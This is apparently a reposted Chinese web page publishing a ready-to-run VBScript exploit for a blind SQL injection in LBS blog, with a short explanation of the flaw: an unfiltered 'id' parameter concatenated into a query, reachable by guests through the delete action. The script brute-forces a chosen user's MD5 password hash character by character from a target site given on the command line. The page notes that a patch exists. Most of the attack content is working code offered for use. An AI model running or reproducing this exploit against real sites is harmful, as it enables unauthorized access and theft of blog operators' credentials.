LBS blog sql注射漏洞[All version]-官方已有补丁

呵呵,只是证明下漏洞存在 exp如下,保存为vbs,自己下个程序测试自己吧 'From 剑心 '============================================================================ '使用说明： ' 在命令提示符下： ' cscript.exe lbsblog.vbs 要攻击的网站的博客路径有效的文章id 要破解的博客用户密码 '如： ' cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1 ' by loveshell '============================================================================ On Error Resume Next Dim oArgs Dim olbsXML 'XMLHTTP对象用来打开目标网址 Dim TargetURL '目标网址 Dim userid,articleid '博客用户名 Dim TempStr '存放已获取的部分 MD5密码 Dim CharHex '定义16进制字符 Dim charset Set oArgs = WScript.arguments If oArgs.count < 1 Then Call ShowUsage() Set olbsXML = createObject("Microsoft.XMLHTTP") '补充完整目标网址 TargetURL = oArgs(0) If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/" TargetURL=TargetURL & "article.asp" articleid=oArgs(1) userid=oArgs(2) TempStr="" CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",") WScript.echo "LBS blog All version Exploit"&vbcrlf WScript.echo "By 剑心"&vbcrlf WScript.echo "http://www.loveshell.net/ Just For fun :)"&vbcrlf&vbcrlf WScript.echo "+Fuck the site now"&vbcrlf Call main(TargetURL,BlogName) Set oBokeXML = Nothing '----------------------------------------------sub------------------------------------------------------- '============================================ '函数名称：main '函数功能：主程序，注入获得blog 用户密码 '============================================ Sub main(TargetURL,BlogName) Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage For MainOffset = 1 To 40 For SubOffset = 0 To 15 TempLen = 0 postdata = "" postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"'" OpenURL = TargetURL olbsXML.open "Post",OpenURL, False, "", "" olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded" olbsXML.send "act=delete&id="& escape(postdata) GetPage = BytesToBstr(olbsXML.ResponseBody) '判断访问的页面是否存在 If InStr(GetPage,"deleted")<>0 Then '"博客用户不存在或填写的资料有误" 为错误标志，返回此标志说明猜解的 MD5 不正确 '如果得到 0000000000000000 的 MD5 值，请修改错误标志 ElseIf InStr(GetPage,"permission")<>0 Then TempStr=TempStr & CharHex(SubOffset) WScript.Echo "+Crack now："&TempStr Exit for Else WScript.echo vbcrlf & "Something error" & vbcrlf WScript.echo vbcrlf & GetPage& vbcrlf WScript.Quit End If next Next WScript.Echo vbcrlf& "+We Got It：" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil" End sub '============================================ '函数名称：BytesToBstr '函数功能：将XMLHTTP对象中的内容转化为GB2312编码 '============================================ Function BytesToBstr(body) dim objstream set objstream = createObject("ADODB.Stream") objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = "GB2312" BytesToBstr = objstream.ReadText objstream.Close set objstream = nothing End Function '============================ '函数名称：ShowUsage '函数功能：使用方法提示 '============================ Sub ShowUsage() WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/剑心" WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL BlogName" WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1 1" WScript.echo "" WScript.Quit End Sub 漏洞说明: src_article.asp中的 ...... input["log_id"]=func.checkInt(input["log_id"]); if(!input["id"]){ strError=lang["invalid_parameter"]; }else{ // Check if the article exists theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]); strError=false; } ...... 过滤的是log_id,但是使用的确实id,呵呵 :) 然后呢? class/article.asp中的代码 this.load = function(strselect, strwhere){ var tmpA=connBlog.query("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere); if(tmpA){ this.fill(tmpA[0]); return true; }else{ return false; } } 上面不用说了吧,呵呵.不过触发要条件的,看能满足不哦! function articledelete(){ if(theUser.rights["delete"]<1){ // Check User Right - without DB Query pageHeader(lang["error"]); redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox"); }else{ var theArticle=new lbsArticle(); var strError; 默认情况下guest都有删除权限的,尽管后面还做了判断,但是注入已经发生,而我们正好利用他的判断注射,呵呵

　　推荐阅读

　　lib.utf.js

/* UTF-8 <=> UTF-16 convertion library. */* Copyright (C) 1999 Masanao Izumo <iz@onicos.co.jp> * 2007 Ma Bingyao <andot@ujn.edu.cn> * Version: 2.1 * LastModified: Feb 25, 2007 * This library is free>>>详细阅读

本文标题：LBS blog sql注射漏洞[All version]-官方已有补丁

地址：http://www.17bianji.com/kaifa2/JS/30127.html

1/2 1